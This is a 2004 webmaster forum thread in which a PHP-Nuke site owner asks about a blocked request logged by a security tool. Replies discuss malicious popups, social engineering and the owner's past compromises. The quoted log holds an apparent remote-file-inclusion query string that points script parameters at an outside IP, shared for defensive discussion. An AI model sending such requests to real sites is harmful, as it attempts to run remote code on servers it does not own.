Welcome to WebmasterWorld Guest from

Forum Moderators: phranque

Message Too Old, No Replies

Hack Attempt

Some sort of PHP Script to Hack my site?



10:04 am on Jul 8, 2004 (gmt 0)

10+ Year Member


I've been receiving several notifications like the following ... with [217.XX.104.226...] in the url ... and just am curious if anyone knows what they are attempting to do?

Date & Time: 2004-07-08 02:30:56
Blocked IP: unknown...
User ID: Anonymous (1)
Reason: Abuse - OTHER
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/
Query String: newbiehangout.com/modules.php?name=http://217.XX.104.226/&file=http://217.XX.104.226/&func=http://217.XX.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.2XX.221.7
Remote Port: 57529
Request Method: GET
Who-Is for IP
OrgName: Unknown Works
Address: 3928 SE Tolman st
City: Portland
StateProv: OR
PostalCode: 97202
Country: US

NetRange: 63.2XX.164.144 - 63.2XX.164.151
CIDR: 63.2XX.164.144/29
NetHandle: NET-63-2XX-164-144-1
Parent: NET-63-2XX-0-0-1
NetType: Reassigned
RegDate: 2000-11-16
Updated: 2000-11-16

TechHandle: IO-ORG-ARIN
TechName: Internet Operations, XXYY
TechPhone: +1-800-672-8520
TechEmail: dns-info@XXYY.net

Thank you!

[edited by: DaveAtIFG at 7:37 pm (utc) on July 8, 2004]
[edit reason] No specifics please [/edit]


2:53 pm on Jul 8, 2004 (gmt 0)

10+ Year Member

Mods and/or admins.

Please delete the above post or at least edit the URLs in there. Whatever any of you do don't enter any of the URLs


10:58 pm on Jul 8, 2004 (gmt 0)

10+ Year Member


I'm terribly sorry.

Thanks for editing it.

Does anyone have any ideas on this though?



12:17 am on Jul 9, 2004 (gmt 0)

10+ Year Member

No problem pal.

Let's just say it's been years since I got caught out with techniques like that and it definately "woke me up"

The URL that was in the original post led my browser to open multiple non stop self replicating popups with huge binary sound files.

It's a play on the old trick of doing the same but with telnet windows to consume CPU resource leading to a crash. If my memory serves me correctly it was part of the first .hta virii generator called God Message (or something similar)

Anyway...... as to the cause of why you are getting these messages. Where are you receiving them from?

A software firewall like Zone Alarm etc or in your server logs?


3:08 am on Jul 9, 2004 (gmt 0)

10+ Year Member

Hi Jason,

Thanks for letting me know.

I've been plagued with hack attempts ever since I opened up my PHP Nuke area. I was successfully hacked two times (2 days in a row) a few months ago and then I put in some major security features ... one of which is called "Sentinel" and that is the program that is sending me the alerts letting me know that someone was banned on my site.

Usually the hack alert notifications are pretty straightforward and I can easily see what they were attempting ... usually it's some sort of sql injection method or a play on the url trying to add an admin account or something. And now Sentinel is beefed up to even ban Agents or "web site grabbers".

But I just didn't understand the point of this one or what they were trying to accomplish with this. I've received tons of them in the last couple of days.

Seems kind of weird that they would be doing that to themselves ;o)

Anyway, thanks for your help and again ... sorry ... wasn't thinking when I posted that.

Take care!



9:11 am on Jul 9, 2004 (gmt 0)

10+ Year Member

It sounds as if it could be aimed at you.

Just by posting the URL to your server you are getting the alerts. If they realise this then in all honesty you (and I) are going to check it out leading to the desired result.

Or.... if newbiehangout is your site they could well be using it to mask attempts on others as it appears from that the format of the URL that it is proxying the request.

Good old fashioned social engineering technique.


3:01 am on Jul 10, 2004 (gmt 0)

10+ Year Member

Hi Again,

Yep, that's my url .... but I quit checking the attempted hacks a long time ago. They were hitting my site left and right. I've come to believe in "security through obscurity" LOL

My site was fine until I developed a couple modules for PHP Nuke ... and then the script kiddies found me and had a heyday until I installed all the security features. I still haven't added the content back to the Nuke Portal area ... I got a little nervous about re-adding it again after the first hacks. But, there hasn't been any successful hacks in about 3 months now ... so I guess I just need to get over it and move on ;o) It was a good learning experience for me though. Prior to that, I knew nothing about security and I ended up paying a price for that.

It's actually almost funny now ... but then it's also terribly sad that they don't have anything better to do than to mess with other people's sites like that. And they can't even claim it's for a "cause" or anything ;) It's just malicious. And I don't even think that they really "know" what they're doing. Most of the attempts come in floods ... like after a new vulnerability is posted ...

It's like they wait for someone else to post a code and then they just copy and paste it to see if it works ;o)

Awww, well ... live and learn.

You've been a pleasure to talk to and I appreciate your help.

Take care.



Featured Threads

Hot Threads This Week

Hot Threads This Month